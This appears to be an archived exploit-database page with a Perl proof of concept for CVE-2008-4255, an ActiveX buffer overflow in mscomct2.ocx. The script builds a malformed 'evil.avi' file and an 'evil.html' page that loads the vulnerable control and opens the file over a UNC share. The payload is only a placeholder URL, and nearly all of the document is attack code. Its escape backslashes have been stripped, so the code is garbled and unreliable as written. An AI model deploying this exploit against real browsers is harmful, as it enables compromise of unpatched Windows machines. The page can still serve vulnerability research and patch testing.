MS Visual Basic ActiveX Controls mscomct2.ocx Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Visual Basic ActiveX Controls mscomct2.ocx Buffer Overflow PoC
# Published : 2008-12-12
# Author : Jerome Athias
# Previous Title : EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC
# Next Title : Linux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit

#!/usr/bin/perl
# Microsoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object  Buffer Overflow (CVE-2008-4255) PoC
# You'll need Debugging Tools for Windows http://www.microsoft.com/whdc/devtools/debugging/default.mspx
# /JA
# Come to FRHACK!
# www.frhack.org

print "nMicrosoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoCn";
print "Generating malicious .AVI filen";
print "This file should be served via an UNC pathn";
print "[->] Building  evil.avin";

my $shellcode = "http://metasploit.com";

$FileHeader =
"x52x49x46x46x2Cx08x00x00x41x56x49x20x73x74x72x68x10x00x00x00x76x69x64x73x20x20x20x20x00x00x00x00".
"x00x00x00x00x73x74x72x66x00x08x00x00x28x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00";

open(my $poc, "> evil.avi");
print $poc $FileHeader;
close($poc);

print "[->] evil.avi generatedn";
print "[->] Building  evil.htmln";

$EvilHTML =
"<html><head></head><body><object id='evil' classid='clsid:B09DE715-87C1-11D1-8BE3-0000F8754DA1'><param name='AutoPlay' value='True'></object>".
"<script language=javascript>evil.Open('\\192.168.0.1\share\evil.avi');</script></body></html>";

open(my $poc, "> evil.html");
print $poc $EvilHTML;
close($poc);

print "[->] evil.html generatedn";

# www.Syue.com [2008-12-12]